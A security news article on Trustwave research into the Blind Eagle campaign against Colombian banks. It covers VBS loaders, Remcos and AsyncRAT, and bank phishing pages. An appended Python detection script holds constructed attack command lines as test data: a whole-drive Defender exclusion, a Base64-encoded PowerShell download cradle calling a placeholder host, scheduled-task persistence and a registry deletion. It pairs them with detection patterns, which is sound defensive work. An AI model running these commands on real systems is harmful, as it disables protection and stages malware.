Blind Eagle Hackers Leverage Open-Source RATs and Ciphers to Evade Static Detection
Trustwave SpiderLabs has uncovered a chilling cyber threat targeting Latin American organizations, particularly in the financial sector, with a focus on Colombian institutions.
The threat cluster, linked to the notorious Proton66 OOO infrastructure, employs a cunning mix of open-source Remote Access Trojans (RATs) and advanced obfuscation techniques to bypass static detection mechanisms.
Unmasking a Sophisticated Threat in Latin America
By pivoting from Proton66-associated assets, researchers identified an active infrastructure cluster characterized by interconnected domains and IP addresses, predominantly relying on Visual Basic Script (VBS) files as the initial attack vector.
This campaign, which gained traction in summer 2024, utilizes free Dynamic DNS (DDNS) services and hosts malicious content on IP addresses like 45.135.232.38, revealing a calculated yet surprisingly exposed operation.
The operational tactics of these threat actors, often referred to as Blind Eagle in cybersecurity circles, showcase a blend of simplicity and effectiveness.
Their infrastructure heavily features phishing pages mimicking prominent Colombian banks such as Bancolombia, BBVA, Banco Caja Social, and Davivienda, designed to harvest sensitive user credentials through meticulously crafted HTML, CSS, and image files that replicate legitimate login portals.
Phishing and Malware Deployment
Alongside these phishing efforts, VBS scripts act as loaders for second-stage malware, often deploying publicly available RATs like Remcos and AsyncRAT.
These scripts, frequently obfuscated using tools from subscription-based services like “Crypters and Tools,” incorporate techniques such as privilege escalation, Windows Defender exclusions for entire drives, and registry key deletions for cleanup.

Despite the high-value targets, the infrastructure shows minimal effort toward concealment, with open directories exposing phishing pages and malware files, reflecting a prioritization of rapid deployment over stealth.
The use of platforms like paste.ee, textbin.net, and direct IPv4 references for payload delivery further underscores the campaign’s reliance on accessible, low-cost resources.
This campaign’s botnet management panel, featuring a Brazilian Portuguese interface, offers operators extensive control over compromised hosts, including command execution, file exfiltration, and payload deployment.
With dashboards revealing hundreds of infected machines primarily in Argentina and contextual control options for individual victims, the panel exemplifies the operational simplicity of commodity RAT suites.
The lack of segmentation, consistent domain naming patterns, and reuse of SSL certificates across the infrastructure highlight a glaring oversight by the threat actors, making their operations vulnerable to detection despite their regional success.
Trustwave’s analysis also reveals the use of Base64-encoded strings executed via PowerShell and scheduled tasks to ensure persistence, with payloads often disguised as DLL files before loading the final RATs for command-and-control (C2) communication.
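The loader behaviours described above (Defender exclusions for whole drives, registry key deletions for cleanup, Base64-encoded PowerShell, scheduled-task persistence) all leave traces in process-creation command lines. The following Python is an added detection example, not code from Trustwave or from the report; it runs a few rules over constructed command lines in the shape of Sysmon event ID 1 or Windows 4688 records. The sample paths, task name, placeholder URL and the base64 blob (built inline from a plaintext one-liner) are all constructed for the example, not indicators from the campaign.

```python
from __future__ import annotations

import base64
import binascii
import re
from dataclasses import dataclass

# Constructed sample: the blob is built here from a plaintext one-liner so
# the example runs offline. Neither the URL nor the blob is a real IoC.
_SAMPLE_PLAINTEXT = (
    "IEX (New-Object Net.WebClient)"
    ".DownloadString('http://placeholder.invalid/stage2.txt')"
)
_SAMPLE_B64 = base64.b64encode(_SAMPLE_PLAINTEXT.encode("utf-16le")).decode()

# Constructed process command lines; paths and task names are hypothetical.
SAMPLE_COMMAND_LINES = [
    # benign: an admin excludes one product folder, not a whole drive
    r'powershell.exe Add-MpPreference -ExclusionPath "C:\Program Files\Backup Agent"',
    # whole-drive Defender exclusion, as the VBS loaders are described doing
    r'powershell.exe -nop -w hidden Add-MpPreference -ExclusionPath "C:\"',
    # Base64-encoded PowerShell carrying a download cradle
    f"powershell.exe -NoProfile -EncodedCommand {_SAMPLE_B64}",
    # scheduled-task persistence re-launching a VBS loader
    r'schtasks.exe /create /sc minute /mo 5 /tn "Updater" /tr "wscript.exe C:\Users\Public\upd.vbs"',
    # registry key deletion for cleanup
    r"reg.exe delete HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /v Loader /f",
    # ordinary activity, should produce no finding
    r"notepad.exe C:\Users\alice\notes.txt",
]

# A whole-drive exclusion is "X:" or "X:\" on its own, optionally quoted.
DRIVE_ROOT_EXCLUSION = re.compile(r"""-ExclusionPath\s+["']?([A-Za-z]:\\?)["']?(?=\s|$)""", re.I)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENCODED_COMMAND = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
SCHEDULED_TASK = re.compile(r"\bschtasks(?:\.exe)?\b.*?/create|Register-ScheduledTask", re.I)
REGISTRY_DELETE = re.compile(r"\breg(?:\.exe)?\s+delete\b|Remove-ItemProperty", re.I)
DOWNLOAD_CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\bIEX\b|Invoke-Expression", re.I)


@dataclass
class Finding:
    rule: str
    command_line: str
    detail: str = ""


def decode_powershell_blob(blob: str) -> str | None:
    """Decode a -EncodedCommand argument: base64 over UTF-16LE text."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-16le", errors="replace")


def analyze_command_line(cmd: str) -> list[Finding]:
    """Apply every rule to one command line and return its findings."""
    findings: list[Finding] = []
    m = DRIVE_ROOT_EXCLUSION.search(cmd)
    if m:
        findings.append(Finding("defender_drive_root_exclusion", cmd, m.group(1)))
    m = ENCODED_COMMAND.search(cmd)
    if m:
        # Decode before matching: the cradle is invisible in the raw blob.
        decoded = decode_powershell_blob(m.group(1))
        findings.append(Finding("powershell_encoded_command", cmd, decoded or "<undecodable>"))
        if decoded and DOWNLOAD_CRADLE.search(decoded):
            findings.append(Finding("download_cradle_in_decoded_command", cmd, decoded))
    if SCHEDULED_TASK.search(cmd):
        findings.append(Finding("scheduled_task_creation", cmd))
    if REGISTRY_DELETE.search(cmd):
        findings.append(Finding("registry_key_deletion", cmd))
    return findings


def scan(command_lines: list[str]) -> list[Finding]:
    return [f for cmd in command_lines for f in analyze_command_line(cmd)]


def summarize(findings: list[Finding]) -> dict[str, int]:
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan(SAMPLE_COMMAND_LINES):
        print(f"[{f.rule}] {f.command_line[:60]} | {f.detail[:60]}")
    print(summarize(scan(SAMPLE_COMMAND_LINES)))
```

The drive-root rule deliberately ignores the folder-scoped exclusion in the first sample so that routine administration does not page anyone; the encoded-command rule decodes the UTF-16LE payload before looking for a download cradle, because static string matching on the raw blob sees nothing. In production the same functions would be fed command lines from the EDR or SIEM rather than the constructed list.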
For organizations in Latin America, especially within the financial sector, this threat underscores the urgent need for robust defenses.
Banking-themed phishing emails tailored to regional audiences pose a significant risk, necessitating advanced email filtering solutions like Trustwave MailMarshal, alongside regular staff training on localized phishing tactics.
Proactive monitoring of regionally targeted infrastructure and threat indicators can further mitigate the risk of compromise.

While the Blind Eagle campaign may lack sophistication in concealment, its ability to scale across the LATAM region signals a growing cyber threat that demands immediate attention and fortified cybersecurity measures to protect sensitive data and critical systems from these persistent adversaries.